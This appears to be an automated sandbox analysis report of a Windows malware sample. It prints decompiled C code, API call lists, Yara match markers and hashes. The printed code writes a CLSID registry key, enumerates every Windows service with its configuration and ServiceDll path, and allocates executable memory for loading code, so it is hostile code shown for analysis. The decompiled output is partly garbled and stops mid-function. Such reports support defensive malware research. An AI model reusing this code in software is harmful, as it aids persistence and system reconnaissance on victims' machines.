                                                                                    				E04EC6010(__ecx, L"Global",  &_v88, __edx, __esi); // executed
                                                                                    				wsprintfW( &_v608, L"SOFTWARE\\Classes\\CLSID\\%s",  &_v88);
                                                                                    				_v612 = 0;
                                                                                    				_t20 = RegCreateKeyExW(0x80000002,  &_v608, 0, 0, 0, 0xf013f, 0,  &_v612, 0); // executed
                                                                                    				if(_t20 == 0) {
                                                                                    					RegSetValueExW(_v612, "1", _t20, 3, _t26, _t35); // executed
                                                                                    					_t37 =  ==  ? 1 : 0;
                                                                                    					RegCloseKey(_v612);
                                                                                    				}
                                                                                    				return E04ED572E(_v8 ^ _t38);
                                                                                    			}
                                                                                    0x04ec9689
                                                                                    0x04ec9690
                                                                                    0x04ec9696
                                                                                    0x04ec9698
                                                                                    0x04ec969a
                                                                                    0x04ec96a7
                                                                                    0x04ec96bc
                                                                                    0x04ec96cd
                                                                                    0x04ec96ea
                                                                                    0x04ec96f2
                                                                                    0x04ec9704
                                                                                    0x04ec9717
                                                                                    0x04ec971a
                                                                                    0x04ec971a
                                                                                    0x04ec9732

                                                                                    APIs
                                                                                      • Part of subcall function 04EC6010: RegOpenKeyExW.KERNEL32(80000002,004F0053,00000000,00020119,?,00000000,00000000,00000378), ref: 04EC61B1
                                                                                      • Part of subcall function 04EC6010: RegQueryValueExW.KERNEL32(?,0061004D,00000000,?,?,0000004A), ref: 04EC61DF
                                                                                      • Part of subcall function 04EC6010: RegCloseKey.ADVAPI32(?), ref: 04EC61F5
                                                                                    • wsprintfW.USER32 ref: 04EC96BC
                                                                                    • RegCreateKeyExW.KERNEL32(80000002,?,00000000,00000000,00000000,000F013F,00000000,?,00000000), ref: 04EC96EA
                                                                                    • RegSetValueExW.KERNEL32(?,04EFD09C,00000000,00000003,00000000,00000000), ref: 04EC9704
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 04EC971A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseValue$CreateOpenQuerywsprintf
                                                                                    • String ID: Global$SOFTWARE\Classes\CLSID\%s
                                                                                    • API String ID: 73588525-1865207932
                                                                                    • Opcode ID: 2339ed76c213a062059769c523539c87b34460ade87e927e94d8b111acaa5a00
                                                                                    • Instruction ID: 8de0fa6c03fc6f4deb6eb00ab4d8010bc91f5fe14b4a1601e8ea972d9be5612b
                                                                                    • Opcode Fuzzy Hash: 2339ed76c213a062059769c523539c87b34460ade87e927e94d8b111acaa5a00
                                                                                    • Instruction Fuzzy Hash: 3C115671A0122CBBD720DBA5EC89EABBB7CEF84755F100069BD09E2144D675AE44DBA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,?,?,?,04ECBFAB), ref: 04EC5930
                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 04EC5937
                                                                                    • GetNativeSystemInfo.KERNEL32(?), ref: 04EC5957
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressInfoLibraryLoadNativeProcSystem
                                                                                    • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                    • API String ID: 2103483237-192647395
                                                                                    • Opcode ID: dc79a4466d0a7afcfea474f1623ec917e633d33736492b80d377cd924fe1de75
                                                                                    • Instruction ID: 138bd05e83242708cb27129c568d240af51845643fa7c00bdb365868f96443a9
                                                                                    • Opcode Fuzzy Hash: dc79a4466d0a7afcfea474f1623ec917e633d33736492b80d377cd924fe1de75
                                                                                    • Instruction Fuzzy Hash: 0EF0A721D4520957CB14DBE49E047FE77B8DB58309F54539AEC18A2100EA65BED1C751
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _free
                                                                                    • String ID:
                                                                                    • API String ID: 269201875-0
                                                                                    • Opcode ID: 974350fdc4d5283f417c0f62643b14919e29cb709d9829376dd887276987a618
                                                                                    • Instruction ID: a5f787a73497ff10ddf193da0edc5e60e4d78d0148662085ded5272bf64c02f2
                                                                                    • Opcode Fuzzy Hash: 974350fdc4d5283f417c0f62643b14919e29cb709d9829376dd887276987a618
                                                                                    • Instruction Fuzzy Hash: 8A2172726083556FFB149FB7AC50BFAB799EF4132CF14229ED845A7241EAB27901C250
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,?,?,00000000,00000000,?,?,?,?,?,04D77517), ref: 04D776C4
                                                                                    • LoadLibraryA.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,04D77517), ref: 04D777EB
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415882138.0000000004D77000.00000040.00000001.sdmp, Offset: 04D77000, based on PE: false
                                                                                    Similarity
                                                                                    • API ID: AllocLibraryLoadVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 3550616410-0
                                                                                    • Opcode ID: 54964fafae5adbbae320cbad7eeb31042311fe2330d2569e846e5de631a5928e
                                                                                    • Instruction ID: 2687a6eb7e6d04f62f798d91ae965cd665eef0beeb863f50a4b4eabe350d2d0f
                                                                                    • Opcode Fuzzy Hash: 54964fafae5adbbae320cbad7eeb31042311fe2330d2569e846e5de631a5928e
                                                                                    • Instruction Fuzzy Hash: 8DA16B71A0061A9FDB28CFA9C8807BEB7B5FF84308F298569D415DB244E738F941CB90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • OpenProcess.KERNEL32(00000400,00000000,00000000,00000000), ref: 04EC6ED2
                                                                                    • K32GetModuleFileNameExW.KERNEL32(00000000,00000000,?,00000104), ref: 04EC6EEF
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FileModuleNameOpenProcess
                                                                                    • String ID:
                                                                                    • API String ID: 3261405110-0
                                                                                    • Opcode ID: a811fc18f21e54b751b3ee59bf8b3d4f2db57e8a4b0d6c3ac62c3dc61458adad
                                                                                    • Instruction ID: 02accd6374f70f1b4104802de58595d544eb540beea8e9abfb8a4ffb276f3ac3
                                                                                    • Opcode Fuzzy Hash: a811fc18f21e54b751b3ee59bf8b3d4f2db57e8a4b0d6c3ac62c3dc61458adad
                                                                                    • Instruction Fuzzy Hash: 5C11B175A102089ADB24EF78DD06BBBB3B8EF04344F1051AEEC09D7284EA65AA05C744
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 04D774EF
                                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 04D7751F
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415882138.0000000004D77000.00000040.00000001.sdmp, Offset: 04D77000, based on PE: false
                                                                                    Similarity
                                                                                    • API ID: Virtual$AllocFree
                                                                                    • String ID:
                                                                                    • API String ID: 2087232378-0
                                                                                    • Opcode ID: de5416433aabce8fea5c517e31233714484bb27793a4216edb05e0188f67f8db
                                                                                    • Instruction ID: 594e955f842589d8a361cff04ab13563ac53ba04e33d6b7a0469498e72cfc087
                                                                                    • Opcode Fuzzy Hash: de5416433aabce8fea5c517e31233714484bb27793a4216edb05e0188f67f8db
                                                                                    • Instruction Fuzzy Hash: 30018031B411187BE711ABA88C45BAEBBFCEF85715F6005A5F615EB280EE70BA0047A4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,04EE8691,00000001,00000364,?,04EE0EDA,00000001,00000001), ref: 04EE8222
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AllocateHeap
                                                                                    • String ID:
                                                                                    • API String ID: 1279760036-0
                                                                                    • Opcode ID: 03e84a711cb195fd11636b335649d3087831fc5c03eb66ff0514f0fc63892291
                                                                                    • Instruction ID: ab489b89ecbff97fdc778c291ef0882b71079375b287989146f2e854dbb7978e
                                                                                    • Opcode Fuzzy Hash: 03e84a711cb195fd11636b335649d3087831fc5c03eb66ff0514f0fc63892291
                                                                                    • Instruction Fuzzy Hash: A9F0E935644D2466EB217B23BC00B7A7759FF8A778B196111AC05EB186DA30F80092E0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • WSAStartup.WS2_32(00000202), ref: 04EB106E
                                                                                      • Part of subcall function 04ED5AD1: __onexit.LIBCMT ref: 04ED5AD7
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Startup__onexit
                                                                                    • String ID:
                                                                                    • API String ID: 1034835647-0
                                                                                    • Opcode ID: ac62c1330a9643349b9e99a17a29b4dbe364a760ffe71a49ea721fb870d3388f
                                                                                    • Instruction ID: 90378cc43665961369d91b688cf147acebdd2885854dfcb9c668933dfa092483
                                                                                    • Opcode Fuzzy Hash: ac62c1330a9643349b9e99a17a29b4dbe364a760ffe71a49ea721fb870d3388f
                                                                                    • Instruction Fuzzy Hash: 89E0DFB0A0020CFBEB00EFA5AC0654DBBA4EB88214F4010A9E909C7240EA367E148B82
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Non-executed Functions

                                                                                    C-Code - Quality: 88%
                                                                                    			E04EC2F70(void* __ebx, void* __edi, void* __esi) {
                                                                                    				signed int _v8;
                                                                                    				short _v528;
                                                                                    				short _v1048;
                                                                                    				short _v1568;
                                                                                    				short _v2088;
                                                                                    				short _v2608;
                                                                                    				short _v3128;
                                                                                    				void* _v3132;
                                                                                    				int* _v3136;
                                                                                    				int _v3140;
                                                                                    				WCHAR** _v3144;
                                                                                    				long _v3148;
                                                                                    				int* _v3152;
                                                                                    				long _v3156;
                                                                                    				void* _v3160;
                                                                                    				int* _v3164;
                                                                                    				int* _v3168;
                                                                                    				void* _v3172;
                                                                                    				WCHAR* _v3176;
                                                                                    				WCHAR* _v3180;
                                                                                    				WCHAR* _v3184;
                                                                                    				int* _v3188;
                                                                                    				int _v3192;
                                                                                    				intOrPtr _v3196;
                                                                                    				int* _v3200;
                                                                                    				void* _v3204;
                                                                                    				void* _v3208;
                                                                                    				int _v3212;
                                                                                    				signed int _t206;
                                                                                    				int* _t214;
                                                                                    				long _t215;
                                                                                    				int** _t219;
                                                                                    				void* _t220;
                                                                                    				long _t225;
                                                                                    				void* _t234;
                                                                                    				WCHAR** _t252;
                                                                                    				int _t254;
                                                                                    				int _t255;
                                                                                    				int _t256;
                                                                                    				int _t257;
                                                                                    				int _t258;
                                                                                    				int _t259;
                                                                                    				int _t261;
                                                                                    				int _t263;
                                                                                    				int _t265;
                                                                                    				int _t267;
                                                                                    				int _t271;
                                                                                    				signed int _t295;
                                                                                    				signed int _t313;
                                                                                    				signed int _t319;
                                                                                    				signed int _t325;
                                                                                    				signed int _t333;
                                                                                    				int _t355;
                                                                                    				intOrPtr _t377;
                                                                                    				intOrPtr _t378;
                                                                                    				void* _t389;
                                                                                    				void* _t390;
                                                                                    				WCHAR** _t391;
                                                                                    				WCHAR* _t393;
                                                                                    				WCHAR* _t394;
                                                                                    				WCHAR* _t395;
                                                                                    				WCHAR* _t396;
                                                                                    				int* _t402;
                                                                                    				long _t405;
                                                                                    				void* _t408;
                                                                                    				int* _t423;
                                                                                    				void* _t426;
                                                                                    				void* _t443;
                                                                                    				WCHAR** _t444;
                                                                                    				void* _t445;
                                                                                    				void* _t447;
                                                                                    				void* _t448;
                                                                                    				void* _t449;
                                                                                    				void* _t451;
                                                                                    				void* _t453;
                                                                                    				void* _t455;
                                                                                    				void* _t457;
                                                                                    				void* _t459;
                                                                                    				void* _t461;
                                                                                    				void* _t463;
                                                                                    				void* _t470;
                                                                                    				signed int _t473;
                                                                                    				void* _t474;
                                                                                    				void* _t475;
                                                                                    				void* _t476;
                                                                                    				void* _t477;
                                                                                    
                                                                                    				_t206 =  *0x4f03008; // 0x3d21fb31
                                                                                    				_v8 = _t206 ^ _t473;
                                                                                    				_v3168 = 0;
                                                                                    				_v3152 = 0;
                                                                                    				_v3164 = 0;
                                                                                    				_t389 = OpenSCManagerW(0, 0, 0xf003f);
                                                                                    				_v3204 = _t389;
                                                                                    				if(_t389 == 0) {
                                                                                    					L3:
                                                                                    					return E04ED572E(_v8 ^ _t473);
                                                                                    				} else {
                                                                                    					__imp__EnumServicesStatusExW(_t389, 0, 0x30, 3, 0, 0,  &_v3168,  &_v3152,  &_v3164, 0);
                                                                                    					_t214 = _v3168;
                                                                                    					if(_t214 != 0) {
                                                                                    						_t215 =  &(_t214[0xb]);
                                                                                    						_v3160 = _t215;
                                                                                    						_t426 = LocalAlloc(0x40, _t215);
                                                                                    						_v3208 = _t426;
                                                                                    						if(_t426 != 0) {
                                                                                    							_v3164 = 0;
                                                                                    							_t219 =  &_v3168;
                                                                                    							__imp__EnumServicesStatusExW(_t389, 0, 0x30, 3, _t426, _v3160, _t219,  &_v3152,  &_v3164, 0);
                                                                                    							if(_t219 != 0) {
                                                                                    								_t220 = LocalAlloc(0x40, 0x19000);
                                                                                    								_v3132 = _t220;
                                                                                    								 *_t220 = 0x87;
                                                                                    								_v3148 = 1;
                                                                                    								_t390 = LocalAlloc(0x40, 0x2000);
                                                                                    								_v3188 = 0;
                                                                                    								_v3160 = _t390;
                                                                                    								_v3144 = LocalAlloc(0x40, 0x2000);
                                                                                    								E04EDDAD0(_t426,  &_v528, 0, 0x208);
                                                                                    								_t475 = _t474 + 0xc;
                                                                                    								_v3200 = 0;
                                                                                    								if(_v3152 <= 0) {
                                                                                    									_t225 = 1;
                                                                                    								} else {
                                                                                    									_t470 = lstrlenW;
                                                                                    									_t402 = _t426;
                                                                                    									_v3136 = _t402;
                                                                                    									do {
                                                                                    										_t429 = 0x4efb5d0;
                                                                                    										_v3196 = 0xffffffff;
                                                                                    										_v3156 = 0x4efb5d0;
                                                                                    										 *_v3144 = 0x4efb5d0;
                                                                                    										_v3176 = 0x4efb5d0;
                                                                                    										_v3180 = 0x4efb5d0;
                                                                                    										_v3184 = 0x4efb5d0;
                                                                                    										_t234 = OpenServiceW(_v3204,  *_t402, 1);
                                                                                    										_v3140 = _t234;
                                                                                    										if(_t234 == 0) {
                                                                                    											_t391 = _v3144;
                                                                                    										} else {
                                                                                    											_t402 =  &_v3188;
                                                                                    											if(QueryServiceConfigW(_t234, _t390, 0x2000, _t402) != 0) {
                                                                                    												_v3196 =  *((intOrPtr*)(_t390 + 4));
                                                                                    												_t429 =  !=  ?  *((intOrPtr*)(_t390 + 0xc)) : 0x4efb5d0;
                                                                                    												_t377 =  *((intOrPtr*)(_t390 + 0x10));
                                                                                    												_v3156 = 0x4efb5d0;
                                                                                    												_t412 =  !=  ? _t377 : 0x4efb5d0;
                                                                                    												_t378 =  *((intOrPtr*)(_t390 + 0x18));
                                                                                    												_v3176 =  !=  ? _t377 : 0x4efb5d0;
                                                                                    												_t414 =  !=  ? _t378 : 0x4efb5d0;
                                                                                    												_v3180 =  !=  ? _t378 : 0x4efb5d0;
                                                                                    												_t402 =  !=  ?  *((intOrPtr*)(_t390 + 0x1c)) : 0x4efb5d0;
                                                                                    												_v3184 = _t402;
                                                                                    											}
                                                                                    											_t391 = _v3144;
                                                                                    											__imp__QueryServiceConfig2W(_v3140, 1, _t391, 0x2000,  &_v3188);
                                                                                    											if( *_t391 == 0) {
                                                                                    												 *_t391 = 0x4efb5d0;
                                                                                    											}
                                                                                    											CloseServiceHandle(_v3140);
                                                                                    										}
                                                                                    										E04EDDAD0(_t429,  &_v528, 0, 0x208);
                                                                                    										E04EDDAD0(_t429,  &_v1048, 0, 0x208);
                                                                                    										wsprintfW( &_v3128, L"SYSTEM\\CurrentControlSet\\Services\\%s\\Parameters",  *_v3136);
                                                                                    										_v3192 = 0x104;
                                                                                    										_v3140 = 0;
                                                                                    										E04EDDAD0(_t429,  &_v1048, 0, 0x104);
                                                                                    										_t476 = _t475 + 0x30;
                                                                                    										_v3172 = 0;
                                                                                    										if(RegOpenKeyExW(0x80000002,  &_v3128, 0, 0x20119,  &_v3172) != 0) {
                                                                                    											L21:
                                                                                    											_push(_t402);
                                                                                    											E04EC5FA0(_t429,  &_v1048);
                                                                                    											E04EC5D90(_t391,  &_v1048,  &_v1568, _t429, _t470,  &_v2088,  &_v2608);
                                                                                    											_t477 = _t476 + 0xc;
                                                                                    										} else {
                                                                                    											RegQueryValueExW(_v3172, L"ServiceDll", 0,  &_v3212,  &_v1048,  &_v3192);
                                                                                    											_t402 = 1;
                                                                                    											_t363 =  ==  ? 1 : _v3140;
                                                                                    											_v3140 =  ==  ? 1 : _v3140;
                                                                                    											RegCloseKey(_v3172);
                                                                                    											if(_v3140 == 0 || _v3192 <= 0) {
                                                                                    												goto L21;
                                                                                    											} else {
                                                                                    												ExpandEnvironmentStringsW( &_v1048,  &_v528, 0x104);
                                                                                    												E04EC5D90(_t391,  &_v528,  &_v1568, _t429, _t470,  &_v2088,  &_v2608);
                                                                                    												_t477 = _t476 + 8;
                                                                                    											}
                                                                                    										}
                                                                                    										_t252 = _v3136;
                                                                                    										_v3140 = lstrlenW(_t252[1]);
                                                                                    										_t254 = lstrlenW( *_t391);
                                                                                    										_t255 = lstrlenW( *_t252);
                                                                                    										_t256 = lstrlenW(_v3184);
                                                                                    										_t257 = lstrlenW(_v3180);
                                                                                    										_t258 = lstrlenW(_v3176);
                                                                                    										_t393 = _v3156;
                                                                                    										_t259 = lstrlenW(_t393);
                                                                                    										_t261 = lstrlenW( &_v1568);
                                                                                    										_t263 = lstrlenW( &_v2088);
                                                                                    										_t265 = lstrlenW( &_v2608);
                                                                                    										_t267 = lstrlenW( &_v528);
                                                                                    										_t443 = _v3132;
                                                                                    										_v3156 = _v3148 + 0x3e + _v3140 + _t254 + _t255 + _t256 + _t257 + _t258 + _t259 + _t261 + _t263 + _t265 + _t267 + _v3140 + _t254 + _t255 + _t256 + _t257 + _t258 + _t259 + _t261 + _t263 + _t265 + _t267;
                                                                                    										_t271 = LocalSize(_t443);
                                                                                    										_t405 = _v3156;
                                                                                    										if(_t271 < _t405) {
                                                                                    											_v3132 = LocalReAlloc(_t443, _t405, 0x42);
                                                                                    										}
                                                                                    										_t444 = _v3136;
                                                                                    										E04EDDC90(_v3132 + _v3148,  *_t444, 2 + lstrlenW( *_t444) * 2);
                                                                                    										_t445 = _v3148 + 2 + lstrlenW( *_t444) * 2;
                                                                                    										E04EDDC90(_v3132 + _t445, _v3136[1], 2 + lstrlenW(_v3136[1]) * 2);
                                                                                    										_t447 = _t445 + lstrlenW(_v3136[1]) * 2 + 2;
                                                                                    										E04EDDC90(_v3132 + _t447,  *_v3144, 2 + lstrlenW( *_v3144) * 2);
                                                                                    										_t295 = lstrlenW( *_v3144);
                                                                                    										_t408 = _v3132;
                                                                                    										_t448 = _t447 + _t295 * 2;
                                                                                    										asm("movups xmm0, [eax+0x8]");
                                                                                    										asm("movups [edi+ecx+0x2], xmm0");
                                                                                    										asm("movups xmm0, [eax+0x18]");
                                                                                    										asm("movups [edi+ecx+0x12], xmm0");
                                                                                    										 *(_t448 + _t408 + 0x22) = _v3136[0xa];
                                                                                    										 *((intOrPtr*)(_t448 + _t408 + 0x26)) = _v3196;
                                                                                    										_t449 = _t448 + 0x2a;
                                                                                    										E04EDDC90(_v3132 + _t449, _t393, 2 + lstrlenW(_t393) * 2);
                                                                                    										_t451 = _t449 + lstrlenW(_t393) * 2 + 2;
                                                                                    										E04EDDC90(_v3132 + _t451,  &_v528, 2 + lstrlenW( &_v528) * 2);
                                                                                    										_t313 = lstrlenW( &_v528);
                                                                                    										_t394 = _v3176;
                                                                                    										_t453 = _t451 + _t313 * 2 + 2;
                                                                                    										E04EDDC90(_v3132 + _t453, _t394, 2 + lstrlenW(_t394) * 2);
                                                                                    										_t319 = lstrlenW(_t394);
                                                                                    										_t395 = _v3180;
                                                                                    										_t455 = _t453 + _t319 * 2 + 2;
                                                                                    										E04EDDC90(_v3132 + _t455, _t395, 2 + lstrlenW(_t395) * 2);
                                                                                    										_t325 = lstrlenW(_t395);
                                                                                    										_t396 = _v3184;
                                                                                    										_t457 = _t455 + _t325 * 2 + 2;
                                                                                    										E04EDDC90(_v3132 + _t457, _t396, 2 + lstrlenW(_t396) * 2);
                                                                                    										_t459 = _t457 + lstrlenW(_t396) * 2 + 2;
                                                                                    										_t333 = lstrlenW( &_v1568);
                                                                                    										_t397 = _v3132;
                                                                                    										E04EDDC90(_t459 + _v3132,  &_v1568, 2 + _t333 * 2);
                                                                                    										_t461 = _t459 + lstrlenW( &_v1568) * 2 + 2;
                                                                                    										E04EDDC90(_t461 + _v3132,  &_v2088, 2 + lstrlenW( &_v2088) * 2);
                                                                                    										_t463 = _t461 + lstrlenW( &_v2088) * 2 + 2;
                                                                                    										E04EDDC90(_t463 + _t397,  &_v2608, 2 + lstrlenW( &_v2608) * 2);
                                                                                    										_t475 = _t477 + 0x84;
                                                                                    										_t355 = lstrlenW( &_v2608);
                                                                                    										_t423 =  &(_v3200[0]);
                                                                                    										_t390 = _v3160;
                                                                                    										_t402 =  &(_v3136[0xb]);
                                                                                    										_v3200 = _t423;
                                                                                    										_t225 = _t463 + (_t355 + 1) * 2;
                                                                                    										_v3136 = _t402;
                                                                                    										_v3148 = _t225;
                                                                                    									} while (_t423 < _v3152);
                                                                                    								}
                                                                                    								LocalReAlloc(_v3132, _t225, 0x42);
                                                                                    								LocalFree(_v3144);
                                                                                    								LocalFree(_t390);
                                                                                    								LocalFree(_v3208);
                                                                                    								CloseServiceHandle(_v3204);
                                                                                    								return E04ED572E(_v8 ^ _t473);
                                                                                    							} else {
                                                                                    								CloseServiceHandle(_t389);
                                                                                    								LocalFree(_t426);
                                                                                    								return E04ED572E(_v8 ^ _t473);
                                                                                    							}
                                                                                    						} else {
                                                                                    							CloseServiceHandle(_t389);
                                                                                    							return E04ED572E(_v8 ^ _t473);
                                                                                    						}
                                                                                    					} else {
                                                                                    						CloseServiceHandle(_t389);
                                                                                    						goto L3;
                                                                                    					}
                                                                                    				}
                                                                                    			}
                                                                                    0x04ec2f79
                                                                                    0x04ec2f80
                                                                                    0x04ec2f8d
                                                                                    0x04ec2f97
                                                                                    0x04ec2fa1
                                                                                    0x04ec2fb1
                                                                                    0x04ec2fb3
                                                                                    0x04ec2fbb
                                                                                    0x04ec2ff6
                                                                                    0x04ec3006
                                                                                    0x04ec2fbd
                                                                                    0x04ec2fdf
                                                                                    0x04ec2fe5
                                                                                    0x04ec2fed
                                                                                    0x04ec300e
                                                                                    0x04ec3015
                                                                                    0x04ec301d
                                                                                    0x04ec301f
                                                                                    0x04ec3027
                                                                                    0x04ec304b
                                                                                    0x04ec305d
                                                                                    0x04ec3072
                                                                                    0x04ec307a
                                                                                    0x04ec30a4
                                                                                    0x04ec30ad
                                                                                    0x04ec30b3
                                                                                    0x04ec30b6
                                                                                    0x04ec30c7
                                                                                    0x04ec30c9
                                                                                    0x04ec30d5
                                                                                    0x04ec30e2
                                                                                    0x04ec30f1
                                                                                    0x04ec30f6
                                                                                    0x04ec30f9
                                                                                    0x04ec310a
                                                                                    0x04ec36c2
                                                                                    0x04ec3110
                                                                                    0x04ec3110
                                                                                    0x04ec3116
                                                                                    0x04ec3118
                                                                                    0x04ec3120
                                                                                    0x04ec3126
                                                                                    0x04ec312d
                                                                                    0x04ec3137
                                                                                    0x04ec313d
                                                                                    0x04ec3141
                                                                                    0x04ec314d
                                                                                    0x04ec3153
                                                                                    0x04ec3159
                                                                                    0x04ec315f
                                                                                    0x04ec3167
                                                                                    0x04ec320f
                                                                                    0x04ec316d
                                                                                    0x04ec316d
                                                                                    0x04ec3183
                                                                                    0x04ec318d
                                                                                    0x04ec3198

                                                                                    APIs
                                                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 04EC2FAB
                                                                                    • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,00000000,00000000,00000000,00000000,00000000,00000000), ref: 04EC2FDF
                                                                                    • CloseServiceHandle.ADVAPI32(00000000), ref: 04EC2FF0
                                                                                    • LocalAlloc.KERNEL32(00000040,-0000002C), ref: 04EC301B
                                                                                    • CloseServiceHandle.ADVAPI32(00000000), ref: 04EC302A
                                                                                    • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,00000000,?,00000000,00000000,00000000,00000000), ref: 04EC3072
                                                                                    • CloseServiceHandle.ADVAPI32(00000000), ref: 04EC307D
                                                                                    • LocalFree.KERNEL32(00000000), ref: 04EC3084
                                                                                    • LocalAlloc.KERNEL32(00000040,00019000), ref: 04EC30A4
                                                                                    • LocalAlloc.KERNEL32(00000040,00002000), ref: 04EC30C0
                                                                                    • LocalAlloc.KERNEL32(00000040,00002000), ref: 04EC30DB
                                                                                    • OpenServiceW.ADVAPI32(?,00000000,00000001), ref: 04EC3159
                                                                                    • QueryServiceConfigW.ADVAPI32(00000000,00000000,00002000,00000000), ref: 04EC317B
                                                                                    • QueryServiceConfig2W.ADVAPI32(?,00000001,?,00002000,00000000), ref: 04EC31F0
                                                                                    • CloseServiceHandle.ADVAPI32(?), ref: 04EC3207
                                                                                    Strings
                                                                                    • ServiceDll, xrefs: 04EC32C5
                                                                                    • SYSTEM\CurrentControlSet\Services\%s\Parameters, xrefs: 04EC3249
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Service$Local$AllocCloseHandle$EnumOpenQueryServicesStatus$ConfigConfig2FreeManager
                                                                                    • String ID: SYSTEM\CurrentControlSet\Services\%s\Parameters$ServiceDll
                                                                                    • API String ID: 703603788-2144606380
                                                                                    • Opcode ID: c1de414be6630dd03908ac7a381bfa2d63b780c66ba864cd93f349196f4aabe5
                                                                                    • Instruction ID: 7b1c312ac8a53965cf405664c1ad0f2880a28d47cd589399497f1095d6d83e90
                                                                                    • Opcode Fuzzy Hash: c1de414be6630dd03908ac7a381bfa2d63b780c66ba864cd93f349196f4aabe5
                                                                                    • Instruction Fuzzy Hash: CB2230B190022CABEB21DB68DC85F9EB7B9EF88304F0042D6E509E7151DF75AA94CF50
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 79%
                                                                                    			E04EC98E0(void* __ebx, intOrPtr __ecx, void* __edx) {
                                                                                    				signed int _v0;
                                                                                    				signed int _v8;
                                                                                    				long _v12;
                                                                                    				void* _v16;
                                                                                    				void* _v20;
                                                                                    				char _v24;
                                                                                    				short _v524;
                                                                                    				short _v532;
                                                                                    				short _v548;
                                                                                    				short _v1052;
                                                                                    				struct _CONTEXT _v1764;
                                                                                    				void* _v2048;
                                                                                    				struct _OSVERSIONINFOW _v2052;
                                                                                    				struct _STARTUPINFOW _v2140;
                                                                                    				struct _PROCESS_INFORMATION _v2156;
                                                                                    				void* _v2160;
                                                                                    				void _v2164;
                                                                                    				struct _PROCESS_INFORMATION _v2180;
                                                                                    				void* _v2184;
                                                                                    				long _v2188;
                                                                                    				void* _v2192;
                                                                                    				char _v2196;
                                                                                    				void* _v2200;
                                                                                    				intOrPtr _v2204;
                                                                                    				void* _v2208;
                                                                                    				void* _v2216;
                                                                                    				void* _v2220;
                                                                                    				int _v2224;
                                                                                    				int _v2228;
                                                                                    				void* _v2232;
                                                                                    				void* __edi;
                                                                                    				void* __esi;
                                                                                    				signed int _t117;
                                                                                    				long _t125;
                                                                                    				signed int _t127;
                                                                                    				void* _t135;
                                                                                    				void* _t142;
                                                                                    				void* _t145;
                                                                                    				long _t146;
                                                                                    				_Unknown_base(*)()* _t152;
                                                                                    				signed int _t160;
                                                                                    				signed int _t161;
                                                                                    				_Unknown_base(*)()* _t163;
                                                                                    				void* _t166;
                                                                                    				void* _t173;
                                                                                    				void* _t175;
                                                                                    				void* _t178;
                                                                                    				void* _t182;
                                                                                    				void* _t185;
                                                                                    				long _t188;
                                                                                    				void* _t189;
                                                                                    				void* _t191;
                                                                                    				void* _t198;
                                                                                    				void* _t204;
                                                                                    				long _t205;
                                                                                    				void* _t212;
                                                                                    				intOrPtr _t219;
                                                                                    				void* _t220;
                                                                                    				void* _t224;
                                                                                    				void* _t232;
                                                                                    				intOrPtr* _t234;
                                                                                    				intOrPtr* _t235;
                                                                                    				void* _t250;
                                                                                    				void* _t254;
                                                                                    				void* _t257;
                                                                                    				long _t259;
                                                                                    				void* _t264;
                                                                                    				intOrPtr* _t266;
                                                                                    				void* _t270;
                                                                                    				void* _t272;
                                                                                    				long _t274;
                                                                                    				void* _t275;
                                                                                    				void* _t280;
                                                                                    				void* _t281;
